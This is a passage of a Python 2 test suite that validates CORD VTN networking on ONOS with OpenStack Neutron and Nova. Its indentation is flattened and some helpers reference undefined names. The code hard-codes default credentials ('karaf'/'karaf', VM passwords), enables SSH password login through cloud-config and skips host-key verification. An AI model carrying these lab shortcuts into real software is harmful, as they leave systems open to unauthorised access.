{'floatingip': floatingip_params})
if 'floatingip' in response and 'id' in response['floatingip']:
return response['floatingip']['id']
def make_iperf_pair(server, client, **kwargs):
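    # Start an iperf3 server on 'server', run the client against it and
    # return the parsed JSON report.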
ssh = SSHClient()
ssh.set_missing_host_key_policy(MissingHostKeyPolicy())
ssh.connect(server, username=VM_USERNAME, password=VM_PASSWORD)
ssh.exec_command('/usr/local/bin/iperf3 -s -D')
ssh.connect(client, username=VM_USERNAME, password=VM_PASSWORD)
stdin, stdout, stderr = ssh.exec_command('/usr/local/bin/iperf3 -c %s -J' % server)
rawdata = stdout.read()
data = json.loads(rawdata.translate(None,'\t').translate(None,'\n'))
return data
def connect_ssh(os_ip, private_key_file=None, user='ubuntu'):
key = ssh.RSAKey.from_private_key_file(private_key_file)
client = ssh.SSHClient()
client.set_missing_host_key_policy(ssh.WarningPolicy())
client.connect(ip, username=user, pkey=key, timeout=5)
return client
def validate_vtn_flows(switch):
egress = 1
ingress = 2
egress_map = { 'ether': '00:00:00:00:00:03', 'ip': '192.168.30.1' }
ingress_map = { 'ether': '00:00:00:00:00:04', 'ip': '192.168.40.1' }
device_id = 'of:{}'.format(get_mac(switch))
ctlr = self.ctlr_ip.split(',')[0]
flow = OnosFlowCtrl(deviceId = device_id,
egressPort = egress,
ingressPort = ingress,
ethType = '0x800',
ipSrc = ('IPV4_SRC', ingress_map['ip']+'/32'),
ipDst = ('IPV4_DST', egress_map['ip']+'/32'),
controller = ctlr
)
flow_id = flow.findFlow(device_id, IN_PORT = ('port', ingress),
ETH_TYPE = ('ethType','0x800'), IPV4_SRC = ('ip', ingress_map['ip']+'/32'),
IPV4_DST = ('ip', egress_map['ip']+'/32'))
if flow_id:
return True
def cliEnter(self):
retries = 0
while retries < 3:
self.cli = OnosCliDriver(connect = True)
if self.cli.handle:
break
else:
retries += 1
time.sleep(2)
def cliExit(self):
self.cli.disconnect()
def cordvtn_config_load(self, config = None):
if config:
for k in config.keys():
if cordvtn_config.has_key(k):
cordvtn_config[k] = config[k]
self.onos_load_config(self.cordvtn_dict)
def search_value(self, d, pat):
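        # Recursively search a nested dict/list structure for the value 'pat'.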
match = False
for k, v in d.items():
if isinstance(v, dict):
match = self.search_value(v, pat)
if match is True:
break
elif type(v) is list:
for i in range(len(v)):
if type(v[i]) is dict:
match = self.search_value(v[i], pat)
if match is True:
break
else:
if v[i] == pat:
match = True
return match
elif v == pat:
match = True
return match
if match is True:
print"Network search is successful"
return match
def get_key_value(self, d, key = None, value = None,):
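        # Recursively search a nested dict/list for the given key or value;
        # returns [match, key, value].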
match = False
ret_k = ""
ret_v = ""
if type(d) is not dict:
if type(d) is not list:
match = 'NOT_FOUND'
return [match, ret_k, ret_v]
else:
for i in range(len(d)):
if type(d[i]) is dict:
match,ret_k,ret_v = self.get_key_value(d[i], key, value)
if match is True:
print "Network creation is successful"
break
else:
for k, v in d.items():
if isinstance(v, dict):
match,ret_k,ret_v = self.get_key_value(v, key, value)
if match is True:
break
elif type(v) is list:
for i in range(len(v)):
if type(v[i]) is dict:
match,ret_k,ret_v = self.get_key_value(v[i], key, value)
if match is True:
break
else:
if key:
if k == key:
match = True
return [match, key, v]
elif value:
if v == value:
match = True
return [match, k, value]
else:
if key:
if k == key:
match = True
return [match, key, v]
elif value:
if v == value:
match = True
return [match, k, value]
if match == False:
match = 'NOT_FOUND'
return [match, ret_k, ret_v]
def neutron_network_creation_and_validation(self, net_name):
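        # Create a network via neutron and verify that its name shows up in
        # list_networks().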
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": net_name,"admin_state_up":True}}
net = neutron.create_network(body=body_example)
networks = neutron.list_networks(name=net_name)
data = networks
return self.search_value(data, net_name)
def neutron_network_deletion(self, net_name):
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
networks = neutron.list_networks(name=net_name)
net_id = self.get_key_value(d=networks, key = 'id')
net = neutron.delete_network(net_id[2])
return self.get_key_value(d=networks, value = net_name)
def temp_neutron_subnet_creation_and_validation_v1(self,net_name,sub_cird, sub_net_start = "172.27.0.2", sub_net_end = "172.27.0.200"):
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
networks = neutron.list_networks(name=net_name)
net_id = self.get_key_value(d=networks, key = 'id')
cidr = sub_cird
body_subnet_example = {"subnet":{"network_id": net_id[2],"ip_version":4, "cidr":str(cidr), "allocation_pools": [{"start": "172.27.0.20", "end": "172.27.0.21"}]}}
neutron_sub = neutron.create_subnet(body_subnet_example)
networks = neutron.list_networks(name=net_name)
return self.get_key_value(d=networks, key = 'subnets')
def neutron_subnet_creation_and_validation(self,net_name,sub_cird):
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
networks = neutron.list_networks(name=net_name)
net_id = self.get_key_value(d=networks, key = 'id')
if sub_cird[0] == 'management':
cidr = sub_cird[1]
body_subnet_example = {"subnet":{"network_id": net_id[2],"ip_version":4, "cidr":str(cidr), "allocation_pools": [{"start": sub_cird[2], "end": sub_cird[3]}]}}
elif sub_cird[0] == 'public':
cidr = sub_cird[1]
gate_way = sub_cird[2]
body_subnet_example = {"subnet":{"network_id": net_id[2],"ip_version":4, "cidr":str(cidr), "gateway_ip":str(gate_way)}}
elif sub_cird[0] == 'private':
cidr = sub_cird[1]
gate_way = sub_cird[2]
body_subnet_example = {"subnet":{"network_id": net_id[2],"ip_version":4, "cidr":str(cidr), "gateway_ip":str(gate_way)}}
neutron_sub = neutron.create_subnet(body_subnet_example)
networks = neutron.list_networks(name=net_name)
return self.get_key_value(d=networks, key = 'subnets')
def sub_network_type_post_to_onos(self,net_name,sub_net_type):
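        # POST the network's service type to the ONOS cordvtn serviceNetworks
        # REST endpoint.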
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
networks = neutron.list_networks(name=net_name)
net_id = self.get_key_value(d=networks, key = 'id')
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
network_data = {"ServiceNetwork":{"id": net_id[2],"type":sub_net_type, "providerNetworks":[]}}
json_network_type_data = json.dumps(network_data)
resp = requests.post(url=url, auth=auth, data =json_network_type_data)
return resp
def service_dependency_on_network_post_to_onos(self,service_network_name,provider_network_name,service_network_type ='private'):
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
service_network = neutron.list_networks(name=service_network_name)
service_net_id = self.get_key_value(d=service_network, key = 'id')
provider_network = neutron.list_networks(name=provider_network_name)
provider_net_id = self.get_key_value(d=provider_network, key = 'id')
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
network_data = {"ServiceNetwork":{"id": service_net_id[2],"type":service_network_type, "providerNetworks":[{"bidirectional": 'true', "id": provider_net_id[2]}]}}
json_network_type_data = json.dumps(network_data)
resp = requests.post(url=url, auth=auth, data =json_network_type_data)
return resp
def nova_instance_creation_and_validation(self,net_name,nova_obj,instance_name,image_name, flavor_id):
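        # Boot a nova instance on the given network(s), wait out the BUILD
        # state and dump the console log if it ends up in ERROR.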
print nova_obj.images.list()
image = nova_obj.images.find(name=image_name)
flavor = nova_obj.flavors.find(name=flavor_id)
nics_list = ""
if len(net_name) == 2:
network_1 = nova_obj.networks.find(label=net_name[0])
network_2 = nova_obj.networks.find(label=net_name[1])
print network_1.id
print network_2.id
nics_list = [{'net-id':network_1.id},{'net-id':network_2.id}]
else:
network_1 = nova_obj.networks.find(label=net_name)
print network_1.id
nics_list = [{'net-id':network_1.id}]
server = nova_obj.servers.create(name = instance_name,
image = image.id,
flavor = flavor.id,
nics = nics_list,
userdata = "#cloud-config \n password: ubuntu \n chpasswd: { expire: False }\n ssh_pwauth: True")
# key_name = 'id_rsa')
server_details = nova_obj.servers.find(id=server.id)
print('Server is launched and status is %s' %server_details.status)
if server_details.status == 'BUILD':
time.sleep(120)
server_details = nova_obj.servers.find(id=server.id)
print('After delay server status is %s state'%server_details.status)
if server_details.status == 'ERROR':
print('Server status is still in %s state'%server_details.status)
server_boot_up_log = nova_obj.servers.get_console_output(server.id)
print 'Server boot Up console log \n%s'%server_boot_up_log
return server_details
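# Composite helper: creates the network and subnet, posts the network type to
# ONOS, boots a Nova instance on the network and asserts it goes ACTIVE.
# Returns [nova_client, instance_details] so the caller can clean up later.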
def create_net_subnet_nova_instance(self,net_name, subnet_name, instance_vm_details,management_type):
result = self.neutron_network_creation_and_validation(net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(net_name,subnet_name)# sub_net_start = subnet_name[2], sub_net_end =subnet_name[3])
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(net_name, management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(net_name,nova,instance_vm_details[0],instance_vm_details[1],instance_vm_details[2])
assert_equal(new_instance_details.status, 'ACTIVE')
return [nova, new_instance_details]
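# Helper: runs a ping check over SSH and returns [status, output]. check_type
# selects the path: 'Ping_from_compute' pings the target tenant from the
# compute node, 'Ping_from_source_tenant' pings it from another tenant via a
# nested ssh, and 'Ping_to_external' pings google.com from the target tenant.
# The hard-coded 10.1.0.x addresses are interim fallbacks (see the TO DO notes).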
def nova_instance_tenants_access_check(self, target_tenants_details, compute_details = None, source_tenants_details = None , check_type = 'Ping_from_compute'):
source_tenant_ip = ''
target_tenant_ip = ''
cmd = ''
status = ''
output = ''
## TO DO New instance is not getting subnet ip, hence checking only mysite-vsg1 vm from compute node
if compute_details is None:
compute_ip = '10.1.0.17'
else:
compute_ip = compute_details.ip
## TO DO New instance is not getting subnet ip, hence checking only mysite-vsg1 vm from compute node
if target_tenants_details == {}:
target_tenants_details = '10.1.0.1'
## TO DO New instance is not getting subnet ip, hence checking only mysite-vsg1 vm from compute node
if source_tenants_details is not None:
if source_tenants_details == {}:
source_tenants_details = '10.1.0.1'
if check_type == "Ping_from_compute":
cmd2 = "ping -c 3 {0}".format(target_tenants_details)
ssh_agent = SSHTestAgent(host = compute_ip)
status, output = ssh_agent.run_cmd(cmd2, timeout = 5)
print output
if source_tenants_details is not None:
if check_type == "Ping_from_source_tenant":
cmd = "ping -c 3 {0}".format(target_tenants_details)
ssh_cmd = 'ssh {} {}'.format(source_tenants_details, cmd)
print 'Executing ssh command on compute node %s'%ssh_cmd
ssh_agent = SSHTestAgent(host = compute_ip)
status, output = ssh_agent.run_cmd(ssh_cmd, timeout = 5)
print output
if check_type == "Ping_to_external":
cmd = "ping -c 3 google.com"
ssh_cmd = 'ssh {} {}'.format(target_tenants_details, cmd)
ssh_agent = SSHTestAgent(host = compute_ip)
status, output = ssh_agent.run_cmd(ssh_cmd, timeout = 5)
print output
if status == True and output:
print "Ping is successful"
output = output.strip()
elif status == False:
print "Ping is not successful"
output = None
return [status, output]
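# Helper: deletes a Nova instance and treats a None return value from
# servers.delete() as a successful deletion.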
def nova_instance_deletion(self, nova_obj, server_details):
results_nova_instance_deletion=nova_obj.servers.delete(server_details.id)
if results_nova_instance_deletion is None:
print "Nova instance is deleted"
else:
print "Nova instance is not deleted"
return results_nova_instance_deletion
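# The test cases below share a common pattern: create the Neutron network and
# subnet, optionally push the network type to ONOS over REST, boot Nova
# instances where needed, run the connectivity check, then delete the
# instances and networks before the final assertions.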
def test_cordvtn_neutron_network_creation_and_validation_on_head_node_with_neutron_service(self):
"""
Test Method:
0. Create vtn_test_1_net.
1. Do GET Rest API and validate creation of network.
2. Validate network on neutron openstack.
"""
result = self.neutron_network_creation_and_validation('vtn_test_1_net')
if result is True:
self.neutron_network_deletion('vtn_test_1_net')
assert_equal(result, True)
def test_cordvtn_neutron_network_creation_and_validation_on_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "vtn_test_2_net","admin_state_up":True}}
net = neutron.create_network(body=body_example)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "vtn_test_2_net")
self.neutron_network_deletion('vtn_test_2_net')
assert_equal(result, True)
def test_cordvtn_with_neutron_network_deletion_recreation_and_validation_on_head_node_with_neutron_service(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
result = self.neutron_network_creation_and_validation('vtn_test_3_net')
if result is True:
self.neutron_network_deletion('vtn_test_3_net')
assert_equal(result, True)
result_again = self.neutron_network_creation_and_validation('vtn_test_3_net')
if result_again is True:
self.neutron_network_deletion('vtn_test_3_net')
assert_equal(result, True)
def test_cordvtn_with_neutron_network_deletion_recreation_and_validation_on_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Load cordvtn config, vtn-cfg-1.json to cord-onos
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
body_example = {"network":{"name": "vtn_test_4_net","admin_state_up":True}}
net = neutron.create_network(body=body_example)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "vtn_test_4_net")
assert_equal(result, True)
self.neutron_network_deletion('vtn_test_4_net')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "vtn_test_4_net")
assert_equal(result, False)
net = neutron.create_network(body=body_example)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
result = self.search_value(data, "vtn_test_4_net")
self.neutron_network_deletion('vtn_test_4_net')
assert_equal(result, True)
def test_cordvtn_with_neutron_management_network_creation_and_validation_on_head_node_with_neutron_service(self):
test_net_name = 'vtn_test_5_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
result = self.neutron_network_creation_and_validation('vtn_test_5_net_management')
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
if sub_result[0] is True:
self.neutron_network_deletion('vtn_test_5_net_management')
assert_equal(sub_result[0], True)
def test_cordvtn_with_neutron_management_network_creation_and_validation_on_onos(self):
self.neutron_network_creation_and_validation('vtn_test_6_net_management')
creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**creds)
networks = neutron.list_networks(name='vtn_test_6_net_management')
net_id = self.get_key_value(d=networks, key = 'id')
cidr = "172.27.0.0/24"
body_subnet_example = {"subnet":{"network_id": net_id[2],"ip_version":4, "cidr":str(cidr), "allocation_pools": [{"start": "172.27.0.20", "end": "172.27.0.21"}]}}
neutron_sub = neutron.create_subnet(body_subnet_example)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == 'vtn_test_6_net_management':
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
log_test.info('Sub network is not successful')
self.neutron_network_deletion('vtn_test_6_net_management')
assert_equal(False, True)
break
elif sub_net_id[2] == cidr:
log_test.info('Sub network is successful')
self.neutron_network_deletion('vtn_test_6_net_management')
assert_equal(sub_net_id[0], True)
break
def test_cordvtn_neutron_management_network_creation_and_post_network_type_management_local_to_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Push the network type management_local to onos
5. Verify that onos has the network under management
"""
test_net_name = 'vtn_test_7_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == test_net_name:
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
log_test.info('Sub network is not successful')
assert_equal(False, True)
break
elif sub_net_id[2] == test_sub_net_cidr[1]:
log_test.info('Sub network is successful')
assert_equal(sub_net_id[0], True)
break
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
print("Response from onos to change network service type as management local = %s" %net_type_post.text)
net_type_json = json.loads(net_type_post.text)
self.neutron_network_deletion(test_net_name)
assert_equal(net_type_json['message'], 'null already exists')
def test_cordvtn_with_management_network_creation_launching_nova_instance_and_validation_on_head_node_with_nova_service(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
"""
test_net_name = 'vtn_test_8_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_8_nova_instance_management_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
self.neutron_network_deletion(test_net_name)
self.nova_instance_deletion(nova, new_instance_details)
assert_equal(new_instance_details.status, 'ACTIVE')
def test_cordvtn_with_public_network_creation_and_validation_on_head_node_with_neutron_service(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
test_net_name = 'vtn_test_9_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26",'10.6.1.193']
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
if sub_result[0] is True:
self.neutron_network_deletion(test_net_name)
assert_equal(sub_result[0], True)
def test_cordvtn_with_public_network_creation_and_validation_on_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
"""
test_net_name = 'vtn_test_10_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26", '10.6.1.193']
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == test_net_name:
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
print('Sub network is not successful')
self.neutron_network_deletion(test_net_name)
assert_equal(False, True)
break
elif sub_net_id[2] == test_sub_net_cidr[1]:
print('Sub network is successful')
self.neutron_network_deletion(test_net_name)
assert_equal(sub_net_id[0], True)
break
def test_cordvtn_with_public_network_creation_and_post_network_type_as_public_to_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Push the network type public to onos
5. Verify that onos has the public network
"""
test_net_name = 'vtn_test_11_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26", '10.6.1.193']
test_management_type = "public"
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == test_net_name:
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
log_test.info('Sub network is not successful')
assert_equal(False, True)
break
elif sub_net_id[2] == test_sub_net_cidr[1]:
log_test.info('Sub network is successful')
assert_equal(sub_net_id[0], True)
break
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
print("Response from onos to change network service type as management local = %s" %net_type_post.text)
net_type_json = json.loads(net_type_post.text)
self.neutron_network_deletion(test_net_name)
assert_equal(net_type_json['message'], 'null already exists')
def test_cordvtn_public_network_creation_with_launching_nova_instance_and_validation_on_head_node_with_nova_service(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under public network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under public network
5. Validate new nova instance is created on nova service
"""
test_net_name = 'vtn_test_12_net_public'
test_sub_net_cidr = ["public","10.6.1.192/26",'10.6.1.193']
instance_vm_name = 'vtn_test_12_nova_instance_public_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
self.neutron_network_deletion(test_net_name)
self.nova_instance_deletion(nova, new_instance_details)
assert_equal(new_instance_details.status, 'ACTIVE')
def test_cordvtn_with_private_network_creation_and_validation_on_head_node_with_neutron_service(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Validate network synch with created network in cord-onos
"""
test_net_name = 'vtn_test_13_net_private'
test_sub_net_cidr = ["private","10.160.160.160/24",'10.160.160.1']
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
if sub_result[0] is True:
self.neutron_network_deletion(test_net_name)
assert_equal(sub_result[0], True)
def test_cordvtn_with_private_network_creation_and_validation_on_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
"""
test_net_name = 'vtn_test_14_net_private'
test_sub_net_cidr = ["private","10.160.160.160/24", '10.160.160.1']
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == test_net_name:
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
print('Sub network is not successful')
self.neutron_network_deletion(test_net_name)
assert_equal(False, True)
break
elif sub_net_id[2] == '10.160.160.0/24':
#elif sub_net_id[2] == test_sub_net_cidr[1]:
print('Sub network is successful')
self.neutron_network_deletion(test_net_name)
assert_equal(sub_net_id[0], True)
break
def test_cordvtn_with_private_network_creation_and_post_network_type_as_private_to_onos(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
2. Run sync command for cordvtn
3. Do GET Rest API and validate creation of network
4. Push the network type private to onos
5. Verify that onos has the private network
"""
test_net_name = 'vtn_test_15_net_private'
test_sub_net_cidr = ["private","192.168.160.160/24", '192.168.160.1']
test_management_type = "private"
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
vtn_util = vtn_validation_utils('')
url = "http://{0}:8181/onos/cordvtn/serviceNetworks".format(vtn_util.endpoint)
auth = ('karaf','karaf')
resp = requests.get(url=url, auth=auth)
data = json.loads(resp.text)
for i in range(len(data['ServiceNetworks'])):
if data['ServiceNetworks'][i]['name'] == test_net_name:
sub_net_id = self.get_key_value(d=data['ServiceNetworks'][i], key = 'subnet')
if sub_net_id[2] == " ":
log_test.info('Sub network is not successful')
assert_equal(False, True)
break
elif sub_net_id[2] == "192.168.160.0/24":
log_test.info('Sub network is successful')
assert_equal(sub_net_id[0], True)
break
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
print("Response from onos to change network service type as management local = %s" %net_type_post.text)
net_type_json = json.loads(net_type_post.text)
self.neutron_network_deletion(test_net_name)
assert_equal(net_type_json['message'], 'null already exists')
def test_cordvtn_with_private_network_creation_launching_nova_instance_and_validating_on_head_node_with_nova_service(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under private network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under private network
5. Validate new nova instance is created on nova service
"""
test_net_name = 'vtn_test_16_net_private'
test_sub_net_cidr = ["private","192.168.160.160/24", '192.168.160.1']
instance_vm_name = 'vtn_test_16_nova_instance_private_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
self.neutron_network_deletion(test_net_name)
self.nova_instance_deletion(nova, new_instance_details)
assert_equal(new_instance_details.status, 'ACTIVE')
def test_cordvtn_management_network_instance_and_validate_connectivity_from_host_machine_or_compute_node(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify ping from the compute node to the nova instance created in step 4 is successful.
"""
test_net_name = 'vtn_test_17_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_17_nova_instance_management_net'
#image_name = "vsg-1.1"
image_name = "trusty-server-multi-nic"
flavor_id = 'm1.small'
result = self.neutron_network_creation_and_validation(test_net_name)
assert_equal(result, True)
neutron_creds = self.get_neutron_credentials()
neutron = neutronclient.Client(**neutron_creds)
networks = neutron.list_networks(name=test_net_name)
network_id = self.get_key_value(d=networks, key = 'id')
sub_result = self.neutron_subnet_creation_and_validation(test_net_name,test_sub_net_cidr)
assert_equal(sub_result[0], True)
net_type_post = self.sub_network_type_post_to_onos(test_net_name, test_management_type)
creds = get_nova_credentials()
nova = nova_client.Client('2', **creds)
new_instance_details = self.nova_instance_creation_and_validation(test_net_name,nova,instance_vm_name,image_name,flavor_id)
assert_equal(new_instance_details.status, 'ACTIVE')
compute_details = self.get_compute_nodes()
print new_instance_details.addresses
address = new_instance_details.addresses
print 'Nova instance management ip = %s'%(address[test_net_name][0]['addr'])
time.sleep(60)
status, output = self.nova_instance_tenants_access_check(address[test_net_name][0]['addr'])
self.nova_instance_deletion(nova, new_instance_details)
time.sleep(5)
self.neutron_network_deletion(test_net_name)
assert_equal(status, True)
def test_cordvtn_for_management_network_instance_and_validate_connectivity_to_external_network(self):
"""
Test Method:
0. Create Test-Net,
1. Create subnetwork whose ip is under management network
3. Do GET Rest API and validate creation of network
4. Create new nova instance under management network
5. Validate new nova instance is created on nova service
6. Verify the nova instance cannot reach an external network (ping from it should fail).
"""
test_net_name = 'vtn_test_18_net_management'
test_sub_net_cidr = ["management","172.27.0.0/24", "172.27.0.20", "172.27.0.21"]
test_management_type = "management_local"
instance_vm_name = 'vtn_test_18_nova_instance_management_net'
image_name = "vsg-1.1"
flavor_id = 'm1.small'
